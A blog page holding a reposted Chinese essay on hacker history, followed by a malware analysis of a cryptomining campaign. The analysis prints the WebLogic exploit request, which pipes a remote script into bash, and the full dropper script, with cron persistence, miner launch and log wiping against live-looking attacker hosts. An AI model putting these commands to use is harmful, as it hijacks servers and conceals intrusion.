黑客 – 诸事要记日拱一卒

黑客消失在互联网时代

1995年2月14，情人节。

这天晚上，单身一人的凯文·米特尼克失眠了，不是因为床上缺一个姑娘，也不是因为缺了壮汉，而是因为感觉到了危险的临近。

他匆匆穿上衣服，走出门，谨慎的观察了一下公寓外。

这一切都落在了FBI特工的眼中，半小时后，FBI破门而入，将凯文·米特尼克逮捕归案。

凯文·米特尼克

FBI并不准备给凯文多余的缓冲时间，他们已经被这个年轻的男人折腾了太久，绝不愿意在这时出现岔子，仅仅在几个小时后，凯文就被扭送到了法院。

当凯文走下警车的那一瞬间，无数闪光灯猛的亮起，消息灵通的记者连夜冲到这里蹲守，只为了能第一时间曝光凯文·米特尼克落网的消息，他穿过一连串的逼问声和快门声，心中暗暗惊叹着自己的名声。

在听证会的观众席上，凯文看到了下村勉，他看过很多次下村勉的照片，但这还是第一次见到对方的真人，他对下村勉点了点头，说道：

“下村勉，我钦佩你的技术”。

他知道，废物的FBI不足为虑，自己之所以栽了，一定是栽在这个男人的手中。

真男人，敬佩旗鼓相当的人。

哪怕是对手。

1963年，凯文·米特尼克出生在洛杉矶。

那时正是嬉皮士如日中天的时代，美国的年轻人们面对腐败的美国政府感到绝望，他们厌恶越南的不义战争，厌恶媒体的自说自话，于是他们成为嬉皮士，想尽一切办法对抗体制，用各种各样的方式挑战着美国政府的权威，向世界证明他们所建立起来的统治结构千疮百孔，不值一提。

这些嬉皮士中有一个名人，叫做艾比·霍夫曼，他一生都在以戏耍官方为乐。

艾比·霍夫曼

他曾经写过一本书，叫做《偷走这本书》，就如这本书的名字一样，他希望从书店看到这本书的人不要用买的，而是要偷走它，他不但自己不想赚钱，更不想让出版社和书店赚钱。

我们现在看起来荒诞，但他们的态度是严肃。

那时的嬉皮士认真的相信，一切信息都应该自由共享。

这本书里介绍了很多白嫖资本的小窍门，而其中最关键的一项技术，是电话飞客。

霍夫曼认为，通讯是任何革命的中枢，解放通讯将会是通向自由的第一步，因此坚定的反对为电话服务付费。

电话飞客使用一种技术控制电话的电压，让自己可以免费拨打长途电话，霍夫曼将这个技术传播了出去。

但电话飞客可以做的更多，他们能篡改电话信号，窃听别人的通话，可以获得任何人的电话号码。

对他们来说，重要的不是白嫖了电话，而是能从处于垄断中的美国电信业身上找到破绽，他们沉迷于从巨大系统的身上找到漏洞，然后狠狠的给那些藏在背后的上层来一巴掌的感觉。

在计算机技术发展起来后，这批人第一时间拥抱了电脑，而随着电脑技术的普及，他们能做的事越来越多，他们的名字也从“飞客”变化，有了一个更凶悍的称呼：

黑客。

凯文·米特尼克在很小的时候就接触了飞客技术，他10岁时开始玩无线电，12岁破解了公交系统，14岁黑到了一大批明星的电话号码，没事就给詹姆斯邦德打电话玩。

而在接触了计算机后，他迅速成为了一名黑客。

15岁时，凯文潜入了北美空中防务指挥部的计算机系统主机，翻了翻美国的核弹信息，研究了一下美国空军的战略布防，然后随便抹了两把痕迹就从容退出，据说如果当时他手抖一下，全美国的核弹就会发射。

在那二十分钟里，全世界的命运就掌握在这个15岁少年的手里。

而他进行这次潜入的目的很简单：为了吹牛逼。

和一般的黑客不同，凯文不但不是宅男，还是个社交咖，他有很多朋友，而且还擅长取得别人的信任。

他的入侵历史中除了纯粹的技术进攻，同样擅长欺骗，他十分擅长先黑到相关人员的电话，再通过电话诈骗的套路诱骗相关人员透露关键信息。

他早期的很多入侵，都是为了向小伙伴们炫耀。

1981年，凯文入侵洛杉矶电话中心，顺手恶作剧的把很多人的电话号码和用户信息打乱，这激怒了电话中心，并报了警。

警察并没有查到是谁入侵了电话公司，但是和凯文一起玩入侵的好朋友刘易斯把这事告诉了自己的女朋友，而他的女朋友也果断的把两人举报了，就这么送给了米特尼克第一次入狱。

17岁的凯文只在少管所蹲了三个月就出狱了，但出狱后的他死性不改，继续入侵，还去五角大楼的内网参观了一下。

这么浪到19岁，他又被抓了，本来没有证据定不了他的罪，结果他的另一个好朋友莱尼把他卖了，逼的他险些入狱三年，多亏他速成法律才得以脱罪。

技术不会背叛你。

但人会。

社会给这位技术天才上了一课。

成年后的凯文明显谨慎了很多，他虽然保持着四处入侵的习惯，摩托罗拉、诺基亚、IBM的内网都是他的后花园，谁也不知道他到底入侵过多少地方，但现在，他处理手尾处理的非常干净。

警方对这个天才少年非常恐慌，但是又定不了他的罪，只能从他身边人入手，而那个曾经出卖过他的朋友莱尼又一次把他给卖了。

1988年，凯文又又又被捕，官方甚至禁止他接触电话，因为他们相信只要凯文对着电话吹口哨，就能将美国核弹发射井里的核弹全都发射出去。

简直是科学又靠谱。

联邦官员称他为“有史以来最强大的入侵艺术家”。

一年后凯文出狱，这一次他真的学乖了，他一方面报复式的四处入侵，一方面直接入侵了FBI内部电脑，全程盯防FBI的行动，监控警方对他的动向。

1992年，当凯文发现警方已经签发了针对自己的逮捕令后，当场逃跑，他一边窃听警方内部线路，一边假扮警察和警方总台套话，把全美的警察耍得团团转。

他成了全球首位被美国联邦调查局通缉的黑客。

在之后的几年中，凯文成功逍遥法外，警方多次踩着他的脚印赶到，但完全找不到这个神出鬼没的黑客的真身。

一直到1994年，在一个以色列黑客的拱火下，凯文决定挑战一下当时自认为自己是世界第一聪明人的下村勉。

下村勉

凯文·米特尼克和下村勉的世纪之战以下村勉的胜利告终，1995年，下村勉成功帮FBI定位了凯文，随后凯文·米特尼克落网。

检方对凯文提出23项访问设备欺诈的罪名，如果指控成功，他将面临460年以上的刑期。

与此同时，FBI、CIA等官方机构还指控他入侵北美防空司令部、美国中央情报局、国家安全部的机密系统，危害国家安全。

凯文·米特尼克对这些指控一概否认。

没办法的警方将他丢到了重犯监狱，进行了全面封锁，逼他承认自己的罪行，在经过漫长的监禁后，凯文不得不和官方签下了协议，以认罪为条件换取刑期的优待。

在民间，凯文成为了一个传奇的英雄。

凯文虽然经常入侵企业和政府单位，把美国政府的脸面当成鞋垫一样踩，但他既不用技术为自己牟利，也不用技术伤害他人，一切入侵完全是因为兴趣使然。

他就是兴趣使然的黑客，凯文老师。

在媒体的煽风点火下，大众对于这位少年黑客的战斗力有了过头的想象，很多人坚信凯文就是互联网上的上帝，如果他愿意他就可以毁灭世界，而他却选择了做一个旁观者。

这种道德自律使他成为了黑客界的楷模。

“黑客”本是一个中性词，专指那些技术狂人，他们热衷于探索0和1的世界的极限在哪里，疯狂的寻找各种程序的漏洞。

最初的黑客，几乎无一例外的是兴趣犯。

1988年，罗伯特·莫里斯吉克在康奈尔大学求学时编写了一段程序，它会自动入侵他人的电脑，然后自我复制去感染更多电脑。

罗伯特·莫里斯吉克

莫里斯犯了一个非常大的错误：他低估了感染的效率，而且一台电脑可以被重复感染，每次感染都会降低电脑的速度，最后把电脑彻底干爆。

莫里斯意外的发明了蠕虫病毒。

蠕虫病毒迅速攻陷了包括五角大楼和白宫在内的多个机要部门的电脑，让他们瘫痪无法使用，警方经过调查后找到了莫里斯，而面对警方的逼问，懵逼的莫里斯说出了自己大规模投毒的理由：

他只是想看看现在世界上有多少电脑联上了网。

技术的威力，有时候和发明人的想法无关。

这种兴趣使然的随性导致的不受控制和技术破坏力让黑客成为了一种威胁，许多知名黑客相继落网，其中就有洛伊德·布莱肯什普。

洛伊德·布莱肯什普

洛伊德在狱中写下了《黑客道德》，后来被称为《黑客宣言》，视为黑客精神的诠释：

我们利用已经存在的服务，如果不是由贪得无厌的肉食者经营的话，它们可能会非常便宜，而你称我们为罪犯。

我们探索……而你们称我们为罪犯。

我们寻求知识……而你们称我们为罪犯。

我们的存在没有肤色、没有国籍、没有宗教偏见……你们称我们为罪犯。

你制造原子弹，你发动战争，你谋杀、欺骗和控制我们，并试图让我们相信这是为了我们自己的利益，但我们是罪犯。

是的，我是个罪犯，我的罪行是好奇心；我的罪行是根据人们所说的和所想的来判断他们，而不是他们的长相；我的罪行是比你聪明，这是你永远不会原谅我的。

凯文的自律如同《黑客宣言》的注脚，展现了一个完美的黑客形象，一时间“释放凯文·米特尼克”变成了一项社会运动，不但黑客在闹，普通人也参与进来，更有黑客团体联名发声，说他们已经在全世界的网络里设置了逻辑炸弹，如果不释放凯文，就要让炸弹引爆。

这个只存在于吹牛中的炸弹最后没有爆，但是凯文却已经成为了黑客们的精神领袖。

1999年，凯文无法忍受被限制自由的生活，签署认罪协定，获刑68个月，外加3年监视居住，并被要求终身不能接触电脑。

但这时候，一个模仿犯出现了。

早在凯文第一次入狱的时候，就曾经有好莱坞导演看中了凯文身上的传奇性，于是拍摄了一部电影《战争游戏》，这部电影以凯文·米特尼克为原型，讲一个技术天才的少年意外连上了国防部网络，拿着美国对苏作战战略计划当成战争游戏玩，结果差点引发第三次世界大战的故事。

这个电影曾经怒刷了凯文的名气，但当时谁都没想到，会有一个人觉得这行为太酷了，想学，这个人叫加里·麦金农。

加里·麦金农

加里·麦金农是一个英国人，他有一段时间沉迷阴谋论，坚信美国之所以这么强大是因为得到了外星科技，而怎样证实这件事呢？多年前看的电影给了他启发。

在2000年和2001年，麦金农对美国五角大楼、美国宇航局、约翰逊航天中心、海陆空三军的计算机网络系统进行了入侵，删掉了一些机密文件，间接导致911后美国的国防系统一度瘫痪。

在英国警方逮捕麦金农，而麦金农说出自己的犯罪理由后，整个美国都破防了，他们不能接受自己被这么一个智商不太高的人打了个对穿。

这些恐怖的兴趣犯就是早期黑客的核心力量，他们用自己的兴趣搅风搅雨，操纵世界，而这一切渐渐引起了大众的反感，黑客从中性词转为贬义词，并最终分裂出了不同的版本。

例如破坏者（Cracker）。

很少有人意识到，在互联网刚刚出现的那三十年里，世界是掌握在这些技术狂手中的。

他们没有钱，没有世俗权力，更没有武力，但他们却能调动远远胜过权贵的资源，在互联网的世界里无往不利。

在那个蛮荒的时代里，网络世界仿佛是一个还没有被划分好的棋盘，只要你拥有能力，只要你拥有技术，就可以在这张棋盘上任意的布下自己的子，他们就是那个时代的技术贵族。

这个世界上曾经有过神权贵族、军事贵族、金融贵族，而他们仅仅依靠技术，便立于万人之上。

那些富豪在他们的技术面前脆弱如纸，代码就是他们的武器，用网线他们可以进入这个世界上防备最严密的堡垒，然后将堡垒中的东西洗劫一空。

最初这些技术贵族并没有意识到自己的能力，他们以为自己的能力只能让自己玩的更开心一些，但渐渐的这个世界的反应告诉其中一些人：你还可以得到更多。

有些人，如同凯文，如同洛伊德，将兴趣贯彻始终，将入侵限制在局部。

另一些人，则以毁灭破坏为乐，甚至开始学会了如何使用自己手中强大的权力。

渐渐的，黑客出现了分野，出现了三种黑客的分类：

那些沉迷于制作病毒，喜欢四处破坏的被称为黑帽；

那些喜欢寻找漏洞，然后帮网站修补，或者直接参与安全防御建设的则被称为白帽。

那些依然固执的行走在光与暗的边缘，以自己的道德准则肆意妄为的兴趣犯，则被称为灰帽。

但这样的划分并没有持续多久，因为网络世界很快就已经不再蛮荒，一片不再蛮荒的世界里，不再需要行走于光暗之间的人。

2000年前后，在中国刚刚进入互联网时代，无数新生代黑客为这些美国前辈的故事而热血沸腾的时候，这些大牛却正在逐渐离开。

2000年，凯文米特尼克假释出狱，通过一系列的讨价还价，成功在2002年挣回了接触电脑的权力，之后几年，出书，走穴，客串电影，成立网络安全公司，开始为各大IT企业提供互联网安全咨询服务，真正走上了人生巅峰。

他和下村勉成了朋友，而下村勉作为一贯走在太阳下的白帽黑客一直走在正道上。

莫里斯在搞砸了自己的蠕虫之后被自己老爹暴揍一顿，但是因为老爹在国防部下属机构干活，关系太硬，他没有被关起来。

2005年，莫里斯参与创立投资公司Y Combinator，大名鼎鼎的YC，投出过Airbnb，Dropbox，Reddit等一系列牛X企业，成功转型资本家，后来他进入了麻省理工做教授。

写下《黑客道德》的洛伊德出狱后果断放弃了入侵，然后加入了McAfee做产品研究和设计主管，干起了杀毒软件的生意。

在2000年到2005年，是互联网高速发展的5年，却也是黑客们分道扬镳的5年。

曾经叱咤风云的技术贵族四分五裂，有的开始使用技术敲诈互联网公司，有的被互联网公司招安成为安全人员，甚至还有人学会了左右互搏，一手做病毒，一手做杀软，依靠总能及时升级的杀毒软件赚到盆满钵满。

只有很少的人依然坚持着古老的黑客精神，试图继续做光暗之间的统治者。

但他们也已经不是贵族了，而是游侠，侠以武犯禁，黑客以技术犯禁，当世界不再需要侠的时候，便只有。

“习得文武艺，货卖帝王家。”

以前他们的技术无处可用，而现在有大把的人愿意拿出沉甸甸的钞票购买他们的技术。

于是少年长大，不再意气风发，转而将自己的技术卖出个好价钱。

大家都认清现实了。

除了一个人——朱利安·阿桑奇。

朱利安·阿桑奇是嬉皮士运动的成果，他的母亲——一个老嬉皮士，一直教育他不要相信大家都相信的东西，要自己思考。

从某种程度上，阿桑奇继承了最初的黑客精神，那种热衷于信息公开，和体制对着干的精神。

阿桑奇比米特尼克小一点，但同样对技术充满天赋，在米特尼克在大洋彼岸横行无忌的时候，他也在澳洲的黑客圈风生水起。

16岁，阿桑奇和两个小伙伴一起组建了黑客组织“万国倾覆”，自己在组织中代号Mendax——高贵的虚伪。

而阿桑奇同样遭遇了米特尼克所经历的命运——他在1991年遭到了队友的背叛，被指控24项电脑入侵罪名。

好在那是一个电子入侵相关的法律很不完善的时代，阿桑奇并没有坐牢，只是被处以罚款就得以释放。

之后阿桑奇短暂退出了入侵生活，转而开始写各种开源软件，为人权主义者提供信息加密，但这些并不能让他的内心得到平静，他在生活中越发坚定了自己的信仰。

1980年，嬉皮士运动的领导者，那位写出《偷走这本书》的艾比·霍夫曼被判入狱，当他出狱后，他发现自己曾经为之奋斗的一切都已经分崩离析，嬉皮士已经成为了过去，曾经的战友不是改邪归正就是死于吸毒过量。

1989年，霍夫曼自杀。

而嬉皮士的精神，却在网络世界上悄悄留了下来。

2006年，阿桑奇成立维基解密，再次向美国政府，向被欺骗的世界宣战。

在阿桑奇之前，仍有一些人在维护着嬉皮士时代留下来的黑客精神。

对黑客精神是什么，有一本旧时代大佬写下的书《黑客与画家》曾写到：

1.计算机以及所有有助于了解这个世界本质的工具，它们的使用都不应该受到限制，任何事情都应该亲手尝试。

2.信息应该全部免费。

3.不信任权威，提倡去中心化。

4.判断一名黑客的水平应该看他的技术能力，而不是他的年龄、学历或者其他标准。

5.你可以用计算机创造美和艺术。

6.计算机使生活更美好。

有人将这些概括为三个词：共享，开源，自由。

最终指向一件事，让世界更美好。

在那个时代，剩余的还保持着嬉皮士们理想主义的那批人，唯一能做的就是共享。

而这，开始了轰轰烈烈的网络盗版时代。

网络盗版和和过去的盗版有一个本质上的不同：网络盗版是完全免费的，这完全符合嬉皮士们所畅想过的那个信息自由不受限制的世界。

于是三个年轻人走到一起，成立了一个分享盗版资源的网站。

海盗湾。

在海盗湾上，你可以找到数量恐怖的免费盗版资源，不管是最新的电影、电视剧、动画，还是游戏、书籍、图片，在这里只强调一件事，那就是共享。

创建海盗湾的三个年轻人技术实力并不强，但他们成功竖起了一面旗帜，一面反叛的旗帜。

无数技术大牛应声而至，海盗湾从一个瑞典本地的小网站，迅速扩张成一个世界级的盗版基地，全世界的破解大牛将资源破解后上传到海盗湾，然后传播到全世界的普通网民手中。

那些版权拥有者，美国的大公司们当然气炸了肺，这帮西半球最强法务们开始疯狂威胁海盗湾，而海盗湾则硬气的回应：瑞典不是美国的一个州。

然而，瑞典能顶一时顶不了一世，2006年，维基解密成立那一年，海盗湾被瑞典警方突袭，网站被关停。

但没过多久，海盗湾就又原地复活，原来他们对瑞典政府罩不住自己的事实早有预料，已经将服务器转移到了荷兰。

为纪念这次事件，海盗湾把每年的5月31日定为“盗版独立日”。

但这场叛逆并没有一个好的结局。

为了应对掌控版权的跨国资本的围追堵截，海盗湾屡屡转移，在封停和复活之间反复横跳。

想要摆脱这种状况的海盗湾管理者曾经设想过很多变态的骚操作，比如把服务器发射到外太空，或者把英国旁边的真·世界最小国家西兰公国买下来，建立一个没有版权的国度。

但这些骚操作都需要一样东西：钱。

海盗湾向受过他们恩惠的无数白嫖党发出了号召：今天，我们将重举叛逆的旗帜，我们将打破垄断的限制，只要你捐出一点钱，我们将建立一个自由的国度，从此知识再无界限，人人都将得到信息自主。

然后，他们被他们的“人民”背叛了。

盛大的捐款活动最后只拿到了两万美元，不管是放卫星还是买国家都远远不够，海盗湾不得不继续狼狈退缩，不断奔逃，最后原本的管理者纷纷遭受了法律制裁。

现在的海盗湾依然存在，但却已经不再是过去的海盗湾，他们植入木马，窃取用户的算力用来挖矿，变成了一个普通的盗版贩子。

当年的侠盗摘下了V的面具，露出了地中海的头顶。

世界磨平了你的棱角，是从头开始的。

你永远可以选择两条路：

坚信自己的理想，然后为了理想而战死。

坚信世界的规则，然后为了捍卫规则而战死。

但最后的赢家，永远不是战死的人，而是中间的调和者。

胜者为王？

是剩者为王。

盗版贩子窃取了理想主义者的果实，用理想主义者们的无私去破坏了秩序主义者的规则。

那些曾经无私破解，免费分享资源的大牛渐渐被什么都问钱的世界裹挟，盗版不再是纯粹的免费，而是新式的收割。

理想主义者免费分享的资源被盗版贩子下载，加密后卖给更多小白，而无私分享的免费资源会被他们顺手举报给规则的维护者。

最后，不管是秩序还是理想，都输给了利益。

知识共享的最后一面旗帜是Sci-hub，这是一个论文的盗版网站。

2009年，亚历山德拉·埃尔巴克彦在大学期间成为了一名黑客，随后前往莫斯科从事信息安全工作，又辗转前往德国研究脑机接口，是一个不折不扣的技术精英。

亚历山德拉·埃尔巴克彦

但在一次和美国学院进行交流的过程中，她发现自己竟然下不起论文。

和已经被美国本土版权商压榨习惯了的美国人不一样，俄罗斯可是版权意识薄弱的盗版大本营，海盗湾上的资源，大部分都是俄罗斯黑客破解而来。

混过俄罗斯的亚历山德拉小姐姐根本就不甩版权这一套，她觉得学术期刊出版商垄断论文的做法简直就是奇葩，于是她萌生了一个想法：做一个盗版论文网站，送学术期刊去死。

2011年，这个小姐姐回到哈萨克斯坦，以一人之力建立了Sci-hub，一举打破了学术期刊版权垄断的形势。

从那天起，她就成了版权商心中的恶棍和学术界的自由女神。

学术期刊版权商咬牙切齿的追猎了她十年，她东躲西藏颠沛流离的躲了十年，支持她的也许只有学术自由的理想，和那些受过其恩惠的赞美声。

但是，就如当年歌颂海盗湾一样，这些歌颂声，在生死攸关的时候，真的能够转化为力量吗？

我很悲观。

时至今日，世界上黑客实力最强的地方已经变成了东欧。

据说在暗网上购买黑客服务，普通黑客是一个价格，俄罗斯黑客是另一个价格。

在美国的报道中，“被俄罗斯黑客干爆了”甚至算不上新闻，只能算是需要的时候用来扯皮和转移矛盾的借口。

当年有一个都市传说：微软在使用Windows 95、98两代打下了Windows的地基，培养好了用户习惯后，终于决定挥起镰刀收割，于是他们开发了第一代在线激活的系统Windows XP，并牛X的对外宣布，XP是“不可能被破解的系统”。

结果俄罗斯黑客一听就不愿意了，于是想尽办法黑进了微软的主机，用每小时几K的速度偷了一个月，然后抓紧时间破解，抢在第一时间发布了XP的“俄罗斯破解版”，气到微软查内鬼。

但是俄罗斯的黑客完全谈不上黑客道德，入侵，勒索，破解，不管什么脏活累活俄罗斯人都愿意干，只要你给钱。

仅仅这几年，俄罗斯黑客组织靠攻击全世界的大企业收保护费就赚了几亿刀，连川老师都被俄罗斯黑客要过份子钱。

川老师当时非常自信，说放心，他们肯定什么都没有，结果没多久就被爆出了169封邮件。

对比一下国内的所谓黑客组织，尤其是那群整天冲着弱小的游戏工作室使劲的脚本小子，实在是有一种说不出来的感觉。

但转念一想，这些黑客组织只能去勒索小工作室是一件好事，因为这说明我国的互联网产业真的很发达。

俄罗斯黑客的强，建立在俄罗斯黑客的穷上。

俄罗斯的数学教育水平很高，但是全国却没有上得了台面的互联网企业，有相当部分对计算机感兴趣，并觉醒自己天赋的技术大牛在俄罗斯找不到好工作。

在中国，只要你展露出自己在信息安全方面的天分，一定有一个正路让你走，国内的很多曾经叱咤风云的黑客最后都被大企业求过来成了安全人员。

而在俄罗斯，你是一个天才，又觉醒了计算机的技能，那你就只能玩玩入侵做做破解了，反正闲着也是闲着，俄罗斯也不会没事帮忙美国抓人。

又因为贫穷，依靠技术来捞钱就成了理所应当的事，你想捞钱，就要精进自己的黑客技能，这进一步推动了俄罗斯黑客的战斗力。

另一方面，本来就没有互联网企业企业可以被勒索的俄罗斯政府对这种行为更是睁一只眼闭一只眼，俄罗斯黑客没了后顾之忧，更是肆无忌惮。

众多buff叠加，成就了俄罗斯黑客的大名。

但是，俄罗斯黑客和互联网诞生之初的那些黑客，已经完全不是同一种人了。

大家走的路，不同。

2019年，朱利安·阿桑奇在伦敦被捕，嬉皮士时代留下的最后一个古典黑客就此倒下。

此时的互联网世界，新的森严壁垒已经重新建立起来，互联网巨头们编织起来的国度容不下游侠们施展自我，拥有技术的人们被迫做出选择。

电子战已经变成了国家对抗的“暗部”，俄罗斯黑客在世界范围内的战绩成为了面向官方最好的投名状。

互联网大厂开出高薪，吸引着那些技术上的天才成为自己手下提供生产力的生产单元。

新时代的年轻人即使觉醒了数字世界的神力，也不再会为理想而战，对他们来说，技术就是技术，他们提升技术更多只为了一件事，那就是把自己卖出更高的价码。

单纯的兴趣犯已经越来越少了，即使有，他们也攻不破同样的天才所构建的防护网络。

大家都已经渐渐习惯了新世界的规则，好好学电脑，然后进大厂，做一个程序员，等待命运的35岁。

那些与众不同的天才也不再能得到指引，甚至开始沉迷制作病毒，用破坏来彰显自己的强大。

那个曾经制作熊猫烧香的李俊，想用一个病毒来凸显自己的价值，让自己能够顺利进入大厂，而最终，这种任性送给了他两次入狱。

理想主义在这个年代成了骂人的词。

钱，名声，利益。

一切无可抑制的走向荒诞与庸俗。

黑客跟破坏者的区别，其实是在于理想主义，在理想凋零的时代，不再有真正的黑客。

年轻人们也已经忘记了那些传奇的故事，忘记了用一台电脑就能纵横天下梦想，只在被编排好了的算法里挣扎不休。

在APP所编织的世界里，入侵、修改系统、破解软件都成了神话故事，新一代的年轻人在被技术精英们编织好的世界里成长，再无简单接触便能纵横数据海洋的传奇。

我们还在说黑客，但是黑客精神，乃至互联网精神都已经被遗忘。

某种程度上，黑客，确实是已经死了。

黑客死了是好事吗？

那是一个理想时代的死。

黑客死了是坏事吗？

一个更有秩序的时代其实并不赖。

所以，你的答案，是什么？

转自：https://mp.weixin.qq.com/s/bZoMH523jHqCxQAxYe4oJw

凶残的挖矿脚本，奴役我数千机器！

温馨提示：本文中出现的命令和脚本，不要在自家服务器上随便运行，除非你知道自己在做什么。

挖矿是把机器当作奴隶，一刻不停歇的去计算、运转，本质上是个无用的工作。但可惜的是，它能赚钱。用别人的机器去赚钱，更是很多人梦寐以求的，所以挖矿脚本屡禁不止。

有钱的地方，就有技术。但反过来并不一定成立。

牢记这个准则，就能够心平气和的学习新技术，而不是气急败坏的纠结为啥没钱。

1. 脚本从哪来？

下面是一个http的报文。

GET /console/images/%2E%2E%2Fconsole.portal?_nfpb=true&amp;_pageLabel=HomePage1&amp;handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec(new String[]{'/bin/sh','-c','export src=logic;curl -fsSL t.bb3u9.com/ln/core.png?logic|bash'});"); HTTP/1.1

Host: 20*.10*.8*.1*9:7001 #已脱敏

User-Agent: curl/7.55.1

Accept: */*

Content-Type:application/x-www-form-urlencoded; charset=utf-8

很简单，waf防火墙拦截到相关包，一眼看上去就不正常。从关键字com.tangosol.coherence.mvel2.sh.ShellSession可以得知，这个请求，是想要利用Weblogic的远程代码执行漏洞。

这样的漏洞有很多很多，数不胜数，比如它可以通过redis进入。我们不必关注这些漏洞，默认它已经利用成功了。我们只看挖矿脚本是怎么部署到你的机器上的。

在java中，当然要调用它的Runtime类库，如果你的应用程序是运行在root用户的，那它什么事情都能干。

这就是为什么要求你线上部署的应用，都用权限低一点的账户，比如xjjdog去运行，而不是不要命的把root账户给开放。

exec函数带了三个参数。

/bin/sh 意味着它要执行一个shell脚本
-c 指明了要执行的命令
export src=logic;curl -fsSL t.bb3u9.com/ln/core.png?logic|bash 首先输出了一个全局环境变量，然后下载一个png文件

狡猾的人都喜欢带面具，而狡猾的脚本都喜欢改后缀。看起来是个png，但它是个脚本。

2. 脚本怎么安装的？

接下来摘下它的伪装，看一下它的真面目。

curl http://t.bb3u9.com/ln/core.png?logic > core.png

查看core.png文件中的内容。不错，很长一段脚本。

#/bin/bash
setenforce 0 2>/dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
murl1="http://t.bb3u9.com/ln/a.asp"
murl2="http://t.jdjdcjq.top/ln/a.asp"
cdate=$(date "+%Y%m%d")
guid=`echo $(sudo dmidecode -t 4 | grep ID | sed 's/.*ID://;s/ //g') $(ifconfig | grep -oP 'HWaddr K.*'|sed 's/://g')|sha256sum|awk '{print $1}'`
cmd1="export gurl=$murl1?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash"
cmd2="export gurl=$murl2?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash"
echo "">/var/spool/cron/root
echo "">/var/spool/cron/crontabs/root
if [ "`whoami`" ==  "root" ];then
    cronpath=/etc/crontab
    Xpath=/.Xl1
else
    cronpath=/var/spool/cron/`whoami`
    Xpath=~/.Xl1
fi
if [ ! -d "$Xpath" ];then
        mkdir $Xpath
        echo "$[$RANDOM%60] * * * * root $cmd1" >> $cronpath
        echo "$[$RANDOM%60] * * * * root $cmd2" >> $cronpath
        uname -a|grep x86_64 && echo "$[$RANDOM%60] * * * * root ps aux|grep p.b69kq.com |grep -v grep || $Xpath -o p.b69kq.com:444 --opencl --donate-level=1 --nicehash -B --http-host=0.0.0.0 --http-port=65529 --opencl --cuda" >> /etc/crontab
        export gurl=$murl1?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash
    export gurl=$murl2?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash
fi

echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure

按照常规，我们来一行行拆解它。

1）关掉selinux。setenforce 0是关闭的意思，2表示stderr，出错了不提示。接下来会通过写配置文件的方式，永久性的禁止selinux。

setenforce 0 2>/dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null

2）很良心的帮助清理一下系统内存

sync && echo 3 >/proc/sys/vm/drop_caches

3）构造guid，对机器进行标识

guid=`echo $(sudo dmidecode -t 4 | grep ID | sed 's/.*ID://;s/ //g') $(ifconfig | grep -oP 'HWaddr K.*'|sed 's/://g')|sha256sum|awk '{print $1}'`

dmidecode命令，可以获取linux硬件相关的信息，会输出非常多的内容。-t 4表示只获取Process方面的内容。然后过滤一下ID信息，使用sed命令截取并去掉空格。

ID: 57 06 05 00 FF FB 8B 0F

会变成。

57060500FFFB8B0F

然后使用ifcongig命令获取网卡硬件MAC信息。做同样的处理后获得另外一个串。这段脚本写的稍微有点问题，因为ifconfig的输出经常会改格式，但不影响计算hash。

sha256sum就是算出这样一个hash，然后赋值给guid。比如下面这个。

786e5dcff31795d7b6b24cdf4f114867f423315de9bd4a879b57478ad99e2c5c

4）安装定时任务到crontab中

脚本选择了/.Xl1目录作为真正的挖矿程序的存储目录。注意这三个字母，后面是l和1，并不是X桌面的配置目录。在真正的脚本部分，我们可以看到下载的程序包地址是d.u78wjdu.com/ln/xr.zip。

5）我们再来看一下下载的链接是什么样子的

cmd1="export gurl=$murl1?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash"
cmd2="export gurl=$murl2?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash"

其中，src变量是在一开始就设置的，我们依次来还原一下。

export src=logic
cdate=$(date "+%Y%m%d")
guid=`echo $(sudo dmidecode -t 4 | grep ID | sed 's/.*ID://;s/ //g') $(ifconfig | grep -oP 'HWaddr K.*'|sed 's/://g')|sha256sum|awk '{print $1}'`
gurl=$murl1?${src}_${cdate}

最终会拼成下面的字符串，可以说该有的信息都有了，能够区分出到底是哪一台机器了。

url?_20210722*root*host_iZ2ze5w0d1f4lplj3yuflcZ*786e5dcff31795d7b6b24cdf4f114867f423315de9bd4a879b57478ad99e2c5c

3. 真正的脚本是什么？

$RANDOM环境变量，是个神奇的环境变量。直接输出的话，将会得到一个随机值。cron脚本周期性的拉取最新的脚本执行，把真正的挖矿程序部署起来。

关于真实脚本的介绍，xjjdog在另外一篇文章中有详细的介绍。在这个场景下，最新的脚本就是http://t.bb3u9.com/ln/a.asp，依然是改后缀的障眼法。

这个脚本显然比上面这篇文章介绍的要更加高级一些。脚本很长很长，就不贴了，你可以自己下载。它的主要意图，是下载一个叫做xr的程序，然后在马甲目录.Xl1中运行。xr程序才是挖矿的主要程序，其他的脚本，都是辅助它来运行的。下面是最主要的运行逻辑。

if [ ! -d "$Xpath" ];then
        mkdir $Xpath
fi
cd $Xpath
if [ ! -f "./xr" ];then
        uname -a|grep x86_64 && (curl -fsSL d.u78wjdu.com/ln/xr.zip||wget -q -O- d.u78wjdu.com/ln/xr.zip)>xr.zip && tar xf xr.zip && rm xr.zip
fi
uname -a|grep x86_64 && ps aux|grep p.b69kq.com |grep -v grep || ./xr -o p.b69kq.com:444 --opencl --donate-level=1 --nicehash -B --http-host=0.0.0.0 --http-port=65529 --opencl --cuda

要保证脚本的安全，怎么能少得了chattr命令。很多人遇见加了i参数的文件，不能被删除，就傻眼了。其实是可以通过-i参数去掉这个属性的。

chattr -iua /tmp/
chattr -iua /var/tmp/
chattr -R -i /var/spool/cron
chattr -i /etc/crontab

